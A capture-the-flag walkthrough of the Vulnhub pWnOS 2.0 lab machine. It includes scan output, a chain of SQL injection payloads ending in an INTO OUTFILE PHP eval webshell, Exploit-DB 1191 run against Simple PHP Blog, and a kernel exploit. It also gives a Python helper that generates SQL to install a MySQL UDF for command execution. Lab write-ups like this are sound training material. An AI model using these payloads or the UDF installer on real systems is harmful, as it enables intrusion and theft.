
Vulnhub-pWnOS2.0

A simple target machine~

Target machine download link

0x01 Information gathering

nmap scan

nmap -p- 10.10.10.100 -sC -sV -T5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-11 20:18 CST
Nmap scan report for 10.10.10.100
Host is up (0.00057s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
| 2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_ 256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.07 seconds

Directory scan (gobuster)

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
/activate (Status: 302)
/activate.php (Status: 302)
/blog (Status: 301)
/cgi-bin/ (Status: 403)
/includes (Status: 301)
/index (Status: 200)
/index.php (Status: 200)
/info (Status: 200)
/info.php (Status: 200)
/login (Status: 200)
/login.php (Status: 200)
/register (Status: 200)
/register.php (Status: 200)
/server-status (Status: 403)
Second gobuster run. The command line is not shown, but the paths it finds (config, scripts, docs, stats, rss, atom, trackback, upgrade) are the ones nikto later reports under /blog, so this run is against the blog directory:
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
2020/07/11 21:56:15 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/add (Status: 302)
/atom (Status: 200)
/categories (Status: 302)
/colors (Status: 302)
/config (Status: 301)
/comments (Status: 302)
/content (Status: 301)
/contact (Status: 200)
/delete (Status: 302)
/docs (Status: 301)
/flash (Status: 301)
/images (Status: 301)
/interface (Status: 301)
/info (Status: 302)
/index (Status: 200)
/languages (Status: 301)
/login (Status: 200)
/logout (Status: 302)
/options (Status: 302)
/rdf (Status: 200)
/scripts (Status: 301)
/rss (Status: 200)
/setup (Status: 302)
/static (Status: 302)
/themes (Status: 301)
/trackback (Status: 302)
/search (Status: 200)
/upload_img (Status: 302)
/upgrade (Status: 302)
/stats (Status: 200)

nikto scan

nikto -h http://10.10.10.100
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.100
+ Target Hostname: 10.10.10.100
+ Target Port: 80
+ Start Time: 2020-07-11 20:18:33 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.5-1ubuntu7
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ /info/: Output from the phpinfo() function was found.
+ OSVDB-3092: /info/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /register/: This might be interesting...
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 1311031, size: 5108, mtime: Tue Aug 28 18:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /login.php: Admin login page/section found.
+ 8310 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2020-07-11 20:18:49 (GMT8) (16 seconds)
---------------------------------------------------------------------------
nikto -h http://10.10.10.100/blog
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.100
+ Target Hostname: 10.10.10.100
+ Target Port: 80
+ Start Time: 2020-07-11 20:51:51 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.5-1ubuntu7
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /blog/scripts/: Directory indexing found.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ /blog/index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /blog/config/: Directory indexing found.
+ /blog/config/: Configuration information may be available remotely.
+ OSVDB-12184: /blog/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /blog/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /blog/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /blog/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /blog/login/: This might be interesting...
+ OSVDB-3092: /blog/stats/: This might be interesting...
+ OSVDB-3092: /blog/scripts/: This might be interesting... possibly a system shell found.
+ OSVDB-3268: /blog/images/: Directory indexing found.
+ OSVDB-3268: /blog/docs/: Directory indexing found.
+ OSVDB-3268: /blog/images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /blog/config/config.txt, inode: 264197, size: 108, mtime: Tue May 10 07:12:22 2011
+ /blog/config/config.txt: Configuration file found.
+ /blog/login.php: Admin login page/section found.
+ 8313 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2020-07-11 20:53:00 (GMT8) (69 seconds)
---------------------------------------------------------------------------

0x02 Exploitation

Walkthrough-1

After some exploring, I found that http://10.10.10.100/info.php is a phpinfo page, and it reveals the site's absolute path, `/var/www/` (DOCUMENT_ROOT).

At the same time, http://10.10.10.100/login.php has a SQL injection vulnerability: the `email` field of the POST body is concatenated into the query, and an 8-column UNION with column 4 reflected in the page is enough to read anything the database user can.

I dumped the backend usernames and password hashes this way, but they turned out to be of no use.

POST SQL injection payloads (request body sent to login.php)
email=%27 union select 1,2,3,database(),5,6,7,8 -- &pass=1&submit=Login&submitted=TRUE

email=%27 union select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database() -- &pass=1&submit=Login&submitted=TRUE


email=%27 union select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_schema='ch16' and table_name='users' -- &pass=1&submit=Login&submitted=TRUE

email=%27 union select 1,2,3,group_concat(email),5,6,7,8 from users -- &pass=1&submit=Login&submitted=TRUE

email=%27 union select 1,2,3,group_concat(pass),5,6,7,8 from users -- &pass=1&submit=Login&submitted=TRUE

email=%27 union select 1,2,3,load_file('/etc/passwd'),5,6,7,8 -- &pass=1&submit=Login&submitted=TRUE

email=%27 union select 1,2,3,load_file('/var/www/includes/config.inc.php'),5,6,7,8 -- &pass=1&submit=Login&submitted=TRUE

email=%27 union select 1,2,3,'<?php eval($_POST[admin])?>',5,6,7,8 into outfile '/var/www/blog/shell.php' -- &pass=1&submit=Login&submitted=TRUE

I then tried writing a file with the last payload, and it was written successfully. Three things have to line up for INTO OUTFILE to work: the database account needs the FILE privilege, secure_file_priv must not exclude the target path, and the directory must be writable by the MySQL process (here mysqld runs as root, as noted below), so this is worth checking before assuming a write failed silently.

After connecting with AntSword, I found two mysqli_connect files under /var/ and tried both passwords they contained. One of them also worked for the root account, so I was logged in as root straight away (plain password reuse between the database config and the system account).

Walkthrough-2

Same steps as before: get in through AntSword, then bounce a reverse shell back. After running an enumeration script to get privilege-escalation suggestions, I chose CVE-2013-2094 to escalate to root.

Other ways to get a webshell

Because the web root also contains a blog directory, further enumeration of it shows that the blog runs Simple PHP Blog, apparently version 0.4.0. Searching with searchsploit turns up a remote exploit for that version (Exploit-DB 1191).

After downloading and running this perl script, you can replace the blog's original account password with one you set yourself. Then upload a webshell or similar through the admin interface, and that is another way to get a shell.

perl 1191.pl -h http://10.10.10.100/blog -e 3 -U hacker -P hacker

A privilege escalation that might work

After running ps -ef I saw that mysql runs as root, so UDF privilege escalation is worth considering. Testing it along the lines of this blog post, I did not succeed. Note what the error below actually says: "invalid ELF header" means the file that landed in /usr/lib/mysql/plugin/ does not start with an ELF header at all, so it is not the compiled shared object (for example it was written as text or hex instead of raw bytes, or was truncated). A library built for the wrong architecture would fail with a different dlopen message ("wrong ELF class"), so the thing to fix here is the file that was uploaded, not the technique.

mysql> create function sys_eval returns string soname 'mysqludf.so';
create function sys_eval returns string soname 'mysqludf.so';
ERROR 1126 (HY000): Can't open shared library 'mysqludf.so' (errno: 22 /usr/lib/mysql/plugin/mysqludf.so: invalid ELF header)
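An added example (my own, not part of the original post or of the blog it references) that checks a UDF library before it goes anywhere near plugin_dir. The "invalid ELF header" error above is raised when the file mysqld tries to dlopen does not begin with an ELF header, so the check parses the header with struct and accepts only a shared object (ET_DYN) for the machine you expect (uname -m on the target); the helper then emits the hex-literal plus DUMPFILE statements commonly used to write the library binary-safely, followed by the create function line from the page. The plugin directory and file name are assumptions to fill in from SHOW VARIABLES LIKE 'plugin_dir', and the header bytes used in the usage below are constructed, not a real library.

```python
import struct
import sys

ELF_MAGIC = b"\x7fELF"
ET_DYN = 3                              # shared object; ET_EXEC (2) cannot be dlopen'ed as a plugin
EM_386, EM_X86_64 = 3, 62
MACHINE_NAMES = {EM_386: "i386", EM_X86_64: "x86_64"}


def inspect_elf(data: bytes) -> dict:
    """Parse e_ident, e_type and e_machine; raise ValueError for anything that is not ELF."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        raise ValueError("invalid ELF header")   # the same condition mysqld reported
    ei_class, ei_data = data[4], data[5]         # 1/2 = 32/64-bit, 1/2 = little/big endian
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("invalid ELF header")
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack_from(endian + "HH", data, 16)   # right after the 16-byte e_ident
    return {"bits": 32 if ei_class == 1 else 64,
            "type": e_type,
            "machine": MACHINE_NAMES.get(e_machine, hex(e_machine))}


def udf_ready(data: bytes, machine: str) -> bool:
    """True only for an ET_DYN object built for `machine` (value of uname -m on the target)."""
    try:
        header = inspect_elf(data)
    except ValueError:
        return False
    return header["type"] == ET_DYN and header["machine"] == machine


def udf_install_sql(so_bytes: bytes, plugin_dir: str, name: str = "udf.so") -> list:
    """Statements that write the library binary-safely (hex literal + DUMPFILE) and register sys_eval.

    Needs the FILE privilege and a secure_file_priv that does not exclude plugin_dir;
    plugin_dir itself is assumed and should be read from SHOW VARIABLES LIKE 'plugin_dir'.
    """
    path = plugin_dir.rstrip("/") + "/" + name
    return [
        f"select 0x{so_bytes.hex()} into dumpfile '{path}';",
        f"create function sys_eval returns string soname '{name}';",
    ]


if __name__ == "__main__":
    # usage: python3 udf_check.py ./lib_mysqludf_sys.so x86_64
    blob = open(sys.argv[1], "rb").read()
    machine = sys.argv[2] if len(sys.argv) > 2 else "x86_64"
    print(inspect_elf(blob))
    print("ready for plugin_dir" if udf_ready(blob, machine) else "NOT a usable UDF for", machine)
```

Run the check on the exact bytes you are about to upload (after any transfer step), not on the copy that sits on your own machine; a mismatch between the two is precisely what the error on this box looks like.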

Failed attempts

At first I tried Dirty COW for privilege escalation, but it did not work.

0x03 Summary

Enumeration is key.